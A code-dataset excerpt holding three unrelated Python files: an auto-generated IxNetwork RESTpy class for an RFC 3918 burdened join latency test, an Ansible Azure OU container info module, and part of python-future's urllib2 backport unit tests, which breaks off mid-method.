] | permissive | iwanb/ixnetwork_restpy | fa8b885ea7a4179048ef2636c37ef7d3f6692e31 | c2cb68fee9f2cc2f86660760e9e07bd06c0013c2 | refs/heads/master | 2021-01-02T17:27:37.096268 | 2020-02-11T09:28:15 | 2020-02-11T09:28:15 | 239,721,780 | 0 | 0 | NOASSERTION | 2020-02-11T09:20:22 | 2020-02-11T09:20:21 | null | UTF-8 | Python | false | false | 14,092 | py | # MIT LICENSE
#
# Copyright 1997 - 2019 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class Rfc3918burdenedJoinDelay(Base):
    """This object allows to configure the attributes for the RFC 3918 Burdened Join Latency test
    The Rfc3918burdenedJoinDelay class encapsulates a list of rfc3918burdenedJoinDelay resources that is managed by the user.
    A list of resources can be retrieved from the server using the Rfc3918burdenedJoinDelay.find() method.
    The list can be managed by the user by using the Rfc3918burdenedJoinDelay.add() and Rfc3918burdenedJoinDelay.remove() methods.
    """
    # Auto-generated wrapper for a server-side data model (SDM) node; all
    # attribute reads/writes are delegated to Base._get_attribute/_set_attribute.
    __slots__ = ()
    # REST resource name of this node on the IxNetwork server.
    _SDM_NAME = 'rfc3918burdenedJoinDelay'
    def __init__(self, parent):
        super(Rfc3918burdenedJoinDelay, self).__init__(parent)
    @property
    def LearnFrames(self):
        """An instance of the LearnFrames class.
        Returns:
            obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.quicktest.learnframes_0a7db0b5d733de2a0bf3bed5db16c286.LearnFrames)
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        # Child resources are imported lazily to keep module import time down
        # and to avoid circular imports between generated modules.
        from ixnetwork_restpy.testplatform.sessions.ixnetwork.quicktest.learnframes_0a7db0b5d733de2a0bf3bed5db16c286 import LearnFrames
        return LearnFrames(self)._select()
    @property
    def PassCriteria(self):
        """An instance of the PassCriteria class.
        Returns:
            obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.quicktest.passcriteria_57842e729b070f362bf9a6926a764ba8.PassCriteria)
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        from ixnetwork_restpy.testplatform.sessions.ixnetwork.quicktest.passcriteria_57842e729b070f362bf9a6926a764ba8 import PassCriteria
        return PassCriteria(self)._select()
    @property
    def Results(self):
        """An instance of the Results class.
        Returns:
            obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.quicktest.results_08701c700127b29bcc67a54b2c1e849d.Results)
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        from ixnetwork_restpy.testplatform.sessions.ixnetwork.quicktest.results_08701c700127b29bcc67a54b2c1e849d import Results
        return Results(self)._select()
    @property
    def TestConfig(self):
        """An instance of the TestConfig class.
        Returns:
            obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.quicktest.testconfig_8d7d791e7ebdee5deea6e96dfd14895c.TestConfig)
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        from ixnetwork_restpy.testplatform.sessions.ixnetwork.quicktest.testconfig_8d7d791e7ebdee5deea6e96dfd14895c import TestConfig
        return TestConfig(self)._select()
    @property
    def ForceApplyQTConfig(self):
        """Apply QT config
        Returns:
            bool
        """
        return self._get_attribute('forceApplyQTConfig')
    @ForceApplyQTConfig.setter
    def ForceApplyQTConfig(self, value):
        self._set_attribute('forceApplyQTConfig', value)
    @property
    def InputParameters(self):
        """Input Parameters
        Returns:
            str
        """
        return self._get_attribute('inputParameters')
    @InputParameters.setter
    def InputParameters(self, value):
        self._set_attribute('inputParameters', value)
    @property
    def Mode(self):
        """Test mode
        Returns:
            str(existingMode|newMode)
        """
        return self._get_attribute('mode')
    @Mode.setter
    def Mode(self, value):
        self._set_attribute('mode', value)
    @property
    def Name(self):
        """Test name
        Returns:
            str
        """
        return self._get_attribute('name')
    @Name.setter
    def Name(self, value):
        self._set_attribute('name', value)
    def update(self, ForceApplyQTConfig=None, InputParameters=None, Mode=None, Name=None):
        """Updates a child instance of rfc3918burdenedJoinDelay on the server.
        Args:
            ForceApplyQTConfig (bool): Apply QT config
            InputParameters (str): Input Parameters
            Mode (str(existingMode|newMode)): Test mode
            Name (str): Test name
        Raises:
            ServerError: The server has encountered an uncategorized error condition
        """
        # NOTE: parameter names are significant -- locals() is forwarded, so
        # they must match the server-side attribute names exactly.
        self._update(locals())
    def add(self, ForceApplyQTConfig=None, InputParameters=None, Mode=None, Name=None):
        """Adds a new rfc3918burdenedJoinDelay node on the server and retrieves it in this instance.
        Args:
            ForceApplyQTConfig (bool): Apply QT config
            InputParameters (str): Input Parameters
            Mode (str(existingMode|newMode)): Test mode
            Name (str): Test name
        Returns:
            self: This instance with all currently retrieved rfc3918burdenedJoinDelay data using find and the newly added rfc3918burdenedJoinDelay data available through an iterator or index
        Raises:
            ServerError: The server has encountered an uncategorized error condition
        """
        # locals() is forwarded, as in update(); see note there.
        return self._create(locals())
    def remove(self):
        """Deletes all the rfc3918burdenedJoinDelay data in this instance from server.
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        self._delete()
    def find(self, ForceApplyQTConfig=None, InputParameters=None, Mode=None, Name=None):
        """Finds and retrieves rfc3918burdenedJoinDelay data from the server.
        All named parameters support regex and can be used to selectively retrieve rfc3918burdenedJoinDelay data from the server.
        By default the find method takes no parameters and will retrieve all rfc3918burdenedJoinDelay data from the server.
        Args:
            ForceApplyQTConfig (bool): Apply QT config
            InputParameters (str): Input Parameters
            Mode (str(existingMode|newMode)): Test mode
            Name (str): Test name
        Returns:
            self: This instance with matching rfc3918burdenedJoinDelay data retrieved from the server available through an iterator or index
        Raises:
            ServerError: The server has encountered an uncategorized error condition
        """
        return self._select(locals())
    def read(self, href):
        """Retrieves a single instance of rfc3918burdenedJoinDelay data from the server.
        Args:
            href (str): An href to the instance to be retrieved
        Returns:
            self: This instance with the rfc3918burdenedJoinDelay data from the server available through an iterator or index
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        return self._read(href)
    def Apply(self):
        """Executes the apply operation on the server.
        Applies the specified Quick Test.
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        # Arg1 is always the href of this resource for exec operations.
        payload = { "Arg1": self.href }
        return self._execute('apply', payload=payload, response_object=None)
    def ApplyAsync(self):
        """Executes the applyAsync operation on the server.
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        payload = { "Arg1": self.href }
        return self._execute('applyAsync', payload=payload, response_object=None)
    def ApplyAsyncResult(self):
        """Executes the applyAsyncResult operation on the server.
        Returns:
            bool:
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        payload = { "Arg1": self.href }
        return self._execute('applyAsyncResult', payload=payload, response_object=None)
    def ApplyITWizardConfiguration(self):
        """Executes the applyITWizardConfiguration operation on the server.
        Applies the specified Quick Test.
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        payload = { "Arg1": self.href }
        return self._execute('applyITWizardConfiguration', payload=payload, response_object=None)
    def GenerateReport(self):
        """Executes the generateReport operation on the server.
        Generate a PDF report for the last succesfull test run.
        Returns:
            str: This method is asynchronous and has no return value.
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        payload = { "Arg1": self.href }
        return self._execute('generateReport', payload=payload, response_object=None)
    def Run(self, *args, **kwargs):
        """Executes the run operation on the server.
        Starts the specified Quick Test and waits for its execution to finish.
        The IxNetwork modeling infrastructure allows for multiple method Signatures with the same name while python does not.
        The following correlates the modeling Signatures to the python *args variable length list:
        run()list
        Returns:
            list(str): This method is synchronous and returns the result of the test.
        run(InputParameters:string)list
        Args:
            args[0] is InputParameters (str): The input arguments of the test.
        Returns:
            list(str): This method is synchronous and returns the result of the test.
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        payload = { "Arg1": self.href }
        # Positional args map onto Arg2..ArgN of the server-side signature.
        for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
        for item in kwargs.items(): payload[item[0]] = item[1]
        return self._execute('run', payload=payload, response_object=None)
    def Start(self, *args, **kwargs):
        """Executes the start operation on the server.
        Starts the specified Quick Test.
        The IxNetwork modeling infrastructure allows for multiple method Signatures with the same name while python does not.
        The following correlates the modeling Signatures to the python *args variable length list:
        start()
        start(InputParameters:string)
        Args:
            args[0] is InputParameters (str): The input arguments of the test.
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        payload = { "Arg1": self.href }
        for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
        for item in kwargs.items(): payload[item[0]] = item[1]
        return self._execute('start', payload=payload, response_object=None)
    def Stop(self):
        """Executes the stop operation on the server.
        Stops the currently running Quick Test.
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        payload = { "Arg1": self.href }
        return self._execute('stop', payload=payload, response_object=None)
    def WaitForTest(self):
        """Executes the waitForTest operation on the server.
        Waits for the execution of the specified Quick Test to be completed.
        Returns:
            list(str): This method is synchronous and returns the result of the test.
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        payload = { "Arg1": self.href }
        return self._execute('waitForTest', payload=payload, response_object=None)
| [
"srvc_cm_packages@keysight.com"
] | srvc_cm_packages@keysight.com |
6823952645d44cd49647ba4a892a664492f7093b | 02338bb8111fc1aa88e830ac09a11664720eb2d4 | /tmp/azure_rm_oucontainer_info.py | d39f65db9f65e180410688e1d50c78604f5f7fa8 | [] | no_license | Fred-sun/fred_yaml | a49977b0e8505c7447df23dd80c7fef1be70e6bc | 295ca4cd2b59b8d2758f06eb7fd79920327ea524 | refs/heads/master | 2023-04-28T05:51:56.599488 | 2023-04-25T13:52:10 | 2023-04-25T13:52:10 | 131,376,340 | 0 | 1 | null | 2020-07-06T14:22:46 | 2018-04-28T05:34:49 | TSQL | UTF-8 | Python | false | false | 9,484 | py | #!/usr/bin/python
#
# Copyright (c) 2020 GuopengLin, (@t-glin)
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_oucontainer_info
version_added: '2.9'
short_description: Get OuContainer info.
description:
- Get info of OuContainer.
options:
resource_group_name:
description:
- >-
The name of the resource group within the user's subscription. The name
is case insensitive.
required: true
type: str
domain_service_name:
description:
- The name of the domain service.
required: true
type: str
ou_container_name:
description:
- The name of the OuContainer.
type: str
extends_documentation_fragment:
- azure
author:
- GuopengLin (@t-glin)
'''
EXAMPLES = '''
- name: List of OuContainers
azure_rm_oucontainer_info:
domain_service_name: OuContainer.com
resource_group_name: OuContainerResourceGroup
'''
RETURN = '''
ou_container:
description: >-
A list of dict results where the key is the name of the OuContainer and the
values are the facts for that OuContainer.
returned: always
type: complex
contains:
value:
description:
- The list of OuContainer.
returned: always
type: list
sample: null
contains:
tenant_id:
description:
- Azure Active Directory tenant id
returned: always
type: str
sample: null
domain_name:
description:
- The domain name of Domain Services.
returned: always
type: str
sample: null
deployment_id:
description:
- The Deployment id
returned: always
type: str
sample: null
container_id:
description:
- The OuContainer name
returned: always
type: str
sample: null
accounts:
description:
- The list of container accounts
returned: always
type: list
sample: null
contains:
account_name:
description:
- The account name
returned: always
type: str
sample: null
spn:
description:
- The account spn
returned: always
type: str
sample: null
password:
description:
- The account password
returned: always
type: str
sample: null
service_status:
description:
- Status of OuContainer instance
returned: always
type: str
sample: null
provisioning_state:
description:
- >-
The current deployment or provisioning state, which only appears
in the response.
returned: always
type: str
sample: null
next_link:
description:
- The continuation token for the next page of results.
returned: always
type: str
sample: null
id:
description:
- Resource Id
returned: always
type: str
sample: null
name:
description:
- Resource name
returned: always
type: str
sample: null
type:
description:
- Resource type
returned: always
type: str
sample: null
location:
description:
- Resource location
returned: always
type: str
sample: null
tags:
description:
- Resource tags
returned: always
type: dictionary
sample: null
etag:
description:
- Resource etag
returned: always
type: str
sample: null
tenant_id:
description:
- Azure Active Directory tenant id
returned: always
type: str
sample: null
domain_name:
description:
- The domain name of Domain Services.
returned: always
type: str
sample: null
deployment_id:
description:
- The Deployment id
returned: always
type: str
sample: null
container_id:
description:
- The OuContainer name
returned: always
type: str
sample: null
accounts:
description:
- The list of container accounts
returned: always
type: list
sample: null
contains:
account_name:
description:
- The account name
returned: always
type: str
sample: null
spn:
description:
- The account spn
returned: always
type: str
sample: null
password:
description:
- The account password
returned: always
type: str
sample: null
service_status:
description:
- Status of OuContainer instance
returned: always
type: str
sample: null
provisioning_state:
description:
- >-
The current deployment or provisioning state, which only appears in
the response.
returned: always
type: str
sample: null
'''
import time
import json
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
from copy import deepcopy
try:
    from msrestazure.azure_exceptions import CloudError
    # FIX: the code generator emitted "Domain Services Resource Provider",
    # an identifier containing spaces, which is a SyntaxError and made the
    # whole module unimportable.  Collapsed to a valid class name; if the
    # installed SDK exports a different client class name, the ImportError
    # below is caught and handled like any other missing SDK.
    # TODO(review): confirm the client class exported by azure.mgmt.domain.
    from azure.mgmt.domain import DomainServicesResourceProvider
    from msrestazure.azure_operation import AzureOperationPoller
    from msrest.polling import LROPoller
except ImportError:
    # This is handled in azure_rm_common
    pass
class AzureRMOuContainerInfo(AzureRMModuleBase):
    """Gather facts about OuContainer resources of an Azure AD Domain Service.

    When ``ou_container_name`` is supplied a single container is fetched,
    otherwise all containers of the domain service are listed.  Results are
    returned under ``results['ou_container']`` as a list of dicts.
    """
    def __init__(self):
        # Module options; mirror the DOCUMENTATION block of this file.
        self.module_arg_spec = dict(
            resource_group_name=dict(
                type='str',
                required=True
            ),
            domain_service_name=dict(
                type='str',
                required=True
            ),
            ou_container_name=dict(
                type='str'
            )
        )
        self.resource_group_name = None
        self.domain_service_name = None
        self.ou_container_name = None
        self.results = dict(changed=False)
        # FIX: the generator assigned self.mgmt_client = None twice; the
        # duplicate assignment was removed.
        self.mgmt_client = None
        self.state = None
        self.url = None
        self.status_code = [200]
        self.query_parameters = {}
        self.query_parameters['api-version'] = '2017-06-01'
        self.header_parameters = {}
        self.header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        super(AzureRMOuContainerInfo, self).__init__(self.module_arg_spec, supports_tags=True)

    def exec_module(self, **kwargs):
        """Entry point: copy parameters onto self, build the client, dispatch.

        Returns the results dict expected by Ansible (always changed=False).
        """
        for key in self.module_arg_spec:
            setattr(self, key, kwargs[key])
        # FIX: the generator emitted "Domain Services Resource Provider"
        # (an identifier with spaces -- a SyntaxError).  Collapsed to the
        # valid name imported at the top of the file.
        self.mgmt_client = self.get_mgmt_svc_client(DomainServicesResourceProvider,
                                                    base_url=self._cloud_environment.endpoints.resource_manager,
                                                    api_version='2017-06-01')
        if (self.resource_group_name is not None and
                self.domain_service_name is not None and
                self.ou_container_name is not None):
            self.results['ou_container'] = self.format_item(self.get())
        elif (self.resource_group_name is not None and
                self.domain_service_name is not None):
            self.results['ou_container'] = self.format_item(self.list())
        return self.results

    def get(self):
        """Fetch one OuContainer; returns None (and logs) on CloudError."""
        response = None
        try:
            response = self.mgmt_client.ou_container.get(resource_group_name=self.resource_group_name,
                                                         domain_service_name=self.domain_service_name,
                                                         ou_container_name=self.ou_container_name)
        except CloudError as e:
            # FIX: the original message contained an unexpanded generator
            # template ('@(Model.ModuleOperationNameUpper)') and dropped the
            # exception; log something actionable instead.
            self.log('Could not get info for OuContainer: {0}'.format(e))
        return response

    def list(self):
        """List OuContainers of the domain service; None on CloudError."""
        response = None
        try:
            response = self.mgmt_client.ou_container.list(resource_group_name=self.resource_group_name,
                                                          domain_service_name=self.domain_service_name)
        except CloudError as e:
            self.log('Could not list OuContainer info: {0}'.format(e))
        return response

    def format_item(self, item):
        """Normalize a single SDK object, or an iterable of them, to a list of dicts."""
        if hasattr(item, 'as_dict'):
            return [item.as_dict()]
        else:
            # Paged iterables: materialize and convert every element.
            result = []
            for element in list(item):
                result.append(element.as_dict())
            return result
def main():
    # Instantiating the module runs it: AzureRMModuleBase's constructor
    # parses arguments and invokes exec_module().
    AzureRMOuContainerInfo()
if __name__ == '__main__':
    main()
| [
"xiuxi.sun@qq.com"
] | xiuxi.sun@qq.com |
40eb3f09a39462ee8a0cc6338183621cd135cd2d | 7a2bf793ae78a6fbb9081d5117a4273c9a45381f | /future/tests/test_urllib2.py | a5a1167fc00222cbfdb0394f959021cc5ee82f4d | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | frewsxcv/python-future | 410ba3d62180797d4d6afe5f7a9d5d0371a747f3 | 2bb5f0215d9ba89649de6bed55537aefab92c9a7 | refs/heads/master | 2020-12-30T18:30:17.286782 | 2014-06-18T05:25:17 | 2014-06-18T05:25:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 62,630 | py | from __future__ import absolute_import, division, unicode_literals
import os
import io
import socket
import array
import sys
from future.standard_library import import_, install_aliases
from future.backports.test import support
import future.backports.urllib.request as urllib_request
# The proxy bypass method imported below has logic specific to the OSX
# proxy config data structure but is testable on all platforms.
from future.backports.urllib.request import Request, OpenerDirector, _proxy_bypass_macosx_sysconf
import future.backports.urllib.error as urllib_error
from future.tests.base import unittest
from future.builtins import bytes, dict, int, open, str, zip
from future.utils import text_to_native_str
install_aliases() # for base64.encodebytes on Py2
# XXX
# Request
# CacheFTPHandler (hard to write)
# parse_keqv_list, parse_http_list, HTTPDigestAuthHandler
class TrivialTests(unittest.TestCase):
    """Smoke tests for the public surface of the future.backports.urllib package."""
    def test___all__(self):
        # Verify which names are exposed
        for module in 'request', 'response', 'parse', 'error', 'robotparser':
            context = {}
            exec('from future.backports.urllib.%s import *' % module, context)
            del context['__builtins__']
            if module == 'request' and os.name == 'nt':
                # On Windows these two are re-exported from nturl2path.
                u, p = context.pop('url2pathname'), context.pop('pathname2url')
                self.assertEqual(u.__module__, 'nturl2path')
                self.assertEqual(p.__module__, 'nturl2path')
            for k, v in context.items():
                self.assertEqual(v.__module__, 'future.backports.urllib.%s' % module,
                                 "%r is exposed in 'future.backports.urllib.%s' but defined in %r" %
                                 (k, module, v.__module__))
    def test_trivial(self):
        # A couple trivial tests
        self.assertRaises(ValueError, urllib_request.urlopen, 'bogus url')
        # XXX Name hacking to get this to work on Windows.
        fname = os.path.abspath(urllib_request.__file__).replace('\\', '/')
        if os.name == 'nt':
            file_url = "file:///%s" % fname
        else:
            file_url = "file://%s" % fname
        f = urllib_request.urlopen(file_url)
        f.read()
        f.close()
    def test_parse_http_list(self):
        # NOTE: 'list' deliberately shadows the builtin in the loop below.
        tests = [
            ('a,b,c', ['a', 'b', 'c']),
            ('path"o,l"og"i"cal, example', ['path"o,l"og"i"cal', 'example']),
            ('a, b, "c", "d", "e,f", g, h',
             ['a', 'b', '"c"', '"d"', '"e,f"', 'g', 'h']),
            ('a="b\\"c", d="e\\,f", g="h\\\\i"',
             ['a="b"c"', 'd="e,f"', 'g="h\\i"'])]
        for string, list in tests:
            self.assertEqual(urllib_request.parse_http_list(string), list)
    def test_URLError_reasonstr(self):
        err = urllib_error.URLError('reason')
        self.assertIn(err.reason, str(err))
class RequestHdrsTests(unittest.TestCase):
    """Tests for Request header handling and HTTPPasswordMgr lookup rules."""
    def test_request_headers_dict(self):
        """
        The Request.headers dictionary is not a documented interface. It
        should stay that way, because the complete set of headers are only
        accessible through the .get_header(), .has_header(), .header_items()
        interface. However, .headers pre-dates those methods, and so real code
        will be using the dictionary.
        The introduction in 2.4 of those methods was a mistake for the same
        reason: code that previously saw all (urllib2 user)-provided headers in
        .headers now sees only a subset.
        """
        url = "http://example.com"
        self.assertEqual(Request(url,
                                 headers={"Spam-eggs": "blah"}
                                 ).headers["Spam-eggs"], "blah")
        self.assertEqual(Request(url,
                                 headers={"spam-EggS": "blah"}
                                 ).headers["Spam-eggs"], "blah")
    def test_request_headers_methods(self):
        """
        Note the case normalization of header names here, to
        .capitalize()-case. This should be preserved for
        backwards-compatibility. (In the HTTP case, normalization to
        .title()-case is done by urllib2 before sending headers to
        http.client).
        Note that e.g. r.has_header("spam-EggS") is currently False, and
        r.get_header("spam-EggS") returns None, but that could be changed in
        future.
        Method r.remove_header should remove items both from r.headers and
        r.unredirected_hdrs dictionaries
        """
        url = "http://example.com"
        req = Request(url, headers={"Spam-eggs": "blah"})
        self.assertTrue(req.has_header("Spam-eggs"))
        self.assertEqual(req.header_items(), [('Spam-eggs', 'blah')])
        req.add_header("Foo-Bar", "baz")
        self.assertEqual(sorted(req.header_items()),
                         [('Foo-bar', 'baz'), ('Spam-eggs', 'blah')])
        self.assertFalse(req.has_header("Not-there"))
        self.assertIsNone(req.get_header("Not-there"))
        self.assertEqual(req.get_header("Not-there", "default"), "default")
    def test_password_manager(self):
        mgr = urllib_request.HTTPPasswordMgr()
        add = mgr.add_password
        find_user_pass = mgr.find_user_password
        add("Some Realm", "http://example.com/", "joe", "password")
        add("Some Realm", "http://example.com/ni", "ni", "ni")
        add("c", "http://example.com/foo", "foo", "ni")
        add("c", "http://example.com/bar", "bar", "nini")
        add("b", "http://example.com/", "first", "blah")
        add("b", "http://example.com/", "second", "spam")
        add("a", "http://example.com", "1", "a")
        add("Some Realm", "http://c.example.com:3128", "3", "c")
        add("Some Realm", "d.example.com", "4", "d")
        add("Some Realm", "e.example.com:3128", "5", "e")
        self.assertEqual(find_user_pass("Some Realm", "example.com"),
                         ('joe', 'password'))
        #self.assertEqual(find_user_pass("Some Realm", "http://example.com/ni"),
        #                 ('ni', 'ni'))
        self.assertEqual(find_user_pass("Some Realm", "http://example.com"),
                         ('joe', 'password'))
        self.assertEqual(find_user_pass("Some Realm", "http://example.com/"),
                         ('joe', 'password'))
        self.assertEqual(
            find_user_pass("Some Realm", "http://example.com/spam"),
            ('joe', 'password'))
        self.assertEqual(
            find_user_pass("Some Realm", "http://example.com/spam/spam"),
            ('joe', 'password'))
        self.assertEqual(find_user_pass("c", "http://example.com/foo"),
                         ('foo', 'ni'))
        self.assertEqual(find_user_pass("c", "http://example.com/bar"),
                         ('bar', 'nini'))
        self.assertEqual(find_user_pass("b", "http://example.com/"),
                         ('second', 'spam'))
        # No special relationship between a.example.com and example.com:
        self.assertEqual(find_user_pass("a", "http://example.com/"),
                         ('1', 'a'))
        self.assertEqual(find_user_pass("a", "http://a.example.com/"),
                         (None, None))
        # Ports:
        self.assertEqual(find_user_pass("Some Realm", "c.example.com"),
                         (None, None))
        self.assertEqual(find_user_pass("Some Realm", "c.example.com:3128"),
                         ('3', 'c'))
        self.assertEqual(
            find_user_pass("Some Realm", "http://c.example.com:3128"),
            ('3', 'c'))
        self.assertEqual(find_user_pass("Some Realm", "d.example.com"),
                         ('4', 'd'))
        self.assertEqual(find_user_pass("Some Realm", "e.example.com:3128"),
                         ('5', 'e'))
    def test_password_manager_default_port(self):
        """
        The point to note here is that we can't guess the default port if
        there's no scheme. This applies to both add_password and
        find_user_password.
        """
        mgr = urllib_request.HTTPPasswordMgr()
        add = mgr.add_password
        find_user_pass = mgr.find_user_password
        add("f", "http://g.example.com:80", "10", "j")
        add("g", "http://h.example.com", "11", "k")
        add("h", "i.example.com:80", "12", "l")
        add("i", "j.example.com", "13", "m")
        self.assertEqual(find_user_pass("f", "g.example.com:100"),
                         (None, None))
        self.assertEqual(find_user_pass("f", "g.example.com:80"),
                         ('10', 'j'))
        self.assertEqual(find_user_pass("f", "g.example.com"),
                         (None, None))
        self.assertEqual(find_user_pass("f", "http://g.example.com:100"),
                         (None, None))
        self.assertEqual(find_user_pass("f", "http://g.example.com:80"),
                         ('10', 'j'))
        self.assertEqual(find_user_pass("f", "http://g.example.com"),
                         ('10', 'j'))
        self.assertEqual(find_user_pass("g", "h.example.com"), ('11', 'k'))
        self.assertEqual(find_user_pass("g", "h.example.com:80"), ('11', 'k'))
        self.assertEqual(find_user_pass("g", "http://h.example.com:80"),
                         ('11', 'k'))
        self.assertEqual(find_user_pass("h", "i.example.com"), (None, None))
        self.assertEqual(find_user_pass("h", "i.example.com:80"), ('12', 'l'))
        self.assertEqual(find_user_pass("h", "http://i.example.com:80"),
                         ('12', 'l'))
        self.assertEqual(find_user_pass("i", "j.example.com"), ('13', 'm'))
        self.assertEqual(find_user_pass("i", "j.example.com:80"),
                         (None, None))
        self.assertEqual(find_user_pass("i", "http://j.example.com"),
                         ('13', 'm'))
        self.assertEqual(find_user_pass("i", "http://j.example.com:80"),
                         (None, None))
class MockOpener(object):
    """Opener stub: records the arguments of open()/error() calls."""
    addheaders = []

    def open(self, req, data=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
        # Stash everything for later inspection by the test.
        self.req = req
        self.data = data
        self.timeout = timeout

    def error(self, proto, *args):
        self.proto = proto
        self.args = args
class MockFile(object):
    """File-like stub whose read/readline/close are all no-ops."""
    def read(self, count=None):
        pass

    def readline(self, count=None):
        pass

    def close(self):
        pass
class MockHeaders(dict):
    """dict subclass mimicking the legacy message getheaders() API."""
    def getheaders(self, name):
        # The header name is ignored on purpose: all stored values are returned.
        return [value for value in self.values()]
class MockResponse(io.StringIO):
    """In-memory HTTP response: a StringIO body plus status/header metadata."""
    def __init__(self, code, msg, headers, data, url=None):
        io.StringIO.__init__(self, data)
        self.code = code
        self.msg = msg
        self.headers = headers
        self.url = url

    def info(self):
        # Mirrors the http.client response .info() accessor.
        return self.headers

    def geturl(self):
        return self.url
class MockCookieJar(object):
    """Cookie jar stub that simply records what it was handed."""
    def add_cookie_header(self, request):
        self.ach_req = request

    def extract_cookies(self, response, request):
        self.ec_req = request
        self.ec_r = response
class FakeMethod(object):
    """Callable forwarding (meth_name, action, *args) to a handler function."""
    def __init__(self, meth_name, action, handle):
        self.meth_name, self.action, self.handle = meth_name, action, handle

    def __call__(self, *args):
        return self.handle(self.meth_name, self.action, *args)
class MockHTTPResponse(io.IOBase):
    """Minimal http.client-style response whose body is always empty.

    NOTE(review): geturl() reads self.url, which is never assigned here --
    the surrounding code is expected to set it before geturl() is called.
    """
    def __init__(self, fp, msg, status, reason):
        self.fp, self.msg = fp, msg
        self.status, self.reason = status, reason
        self.code = 200  # always reports success

    def read(self):
        return ''

    def info(self):
        return {}

    def geturl(self):
        return self.url
class MockHTTPClass(object):
    """Stand-in for http.client.HTTPConnection that records what was requested."""
    def __init__(self):
        self.level = 0
        self.req_headers = []
        self.data = None
        self.raise_on_endheaders = False
        self.sock = None
        self._tunnel_headers = {}

    def __call__(self, host, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
        # The handler "instantiates" its connection class; returning self lets
        # one object play both the class and the instance.
        self.host = host
        self.timeout = timeout
        return self

    def set_debuglevel(self, level):
        self.level = level

    def set_tunnel(self, host, port=None, headers=None):
        self._tunnel_host = host
        self._tunnel_port = port
        if not headers:
            self._tunnel_headers.clear()
        else:
            self._tunnel_headers = headers

    def request(self, method, url, body=None, headers=None):
        self.method = method
        self.selector = url
        if headers is not None:
            self.req_headers += headers.items()
            self.req_headers.sort()
        if body:
            self.data = body
        if self.raise_on_endheaders:
            import socket
            raise socket.error()

    def getresponse(self):
        return MockHTTPResponse(MockFile(), {}, 200, "OK")

    def close(self):
        pass
class MockHandler(object):
    # useful for testing handler machinery
    # see add_ordered_mock_handlers() docstring
    handler_order = 500
    def __init__(self, methods):
        self._define_methods(methods)
    def _define_methods(self, methods):
        # Each spec is either a plain method name or a (name, action) pair.
        # NOTE(review): a bare name of length 2 would be mis-split by the
        # len(spec) == 2 test below; names used in practice are longer.
        for spec in methods:
            if len(spec) == 2: name, action = spec
            else: name, action = spec, None
            meth = FakeMethod(name, action, self.handle)
            # Installed on the class (not the instance) so it binds like a
            # real method; callers therefore create fresh subclasses.
            setattr(self.__class__, name, meth)
    def handle(self, fn_name, action, *args, **kwds):
        # Record every dispatched call on the shared parent for assertions.
        self.parent.calls.append((self, fn_name, args, kwds))
        if action is None:
            return None
        elif action == "return self":
            return self
        elif action == "return response":
            res = MockResponse(200, "OK", {}, "")
            return res
        elif action == "return request":
            return Request("http://blah/")
        elif action.startswith("error"):
            # "error NNN" -> trigger parent.error() with status NNN; the code
            # stays a string if it does not parse as an int.
            code = action[action.rfind(" ")+1:]
            try:
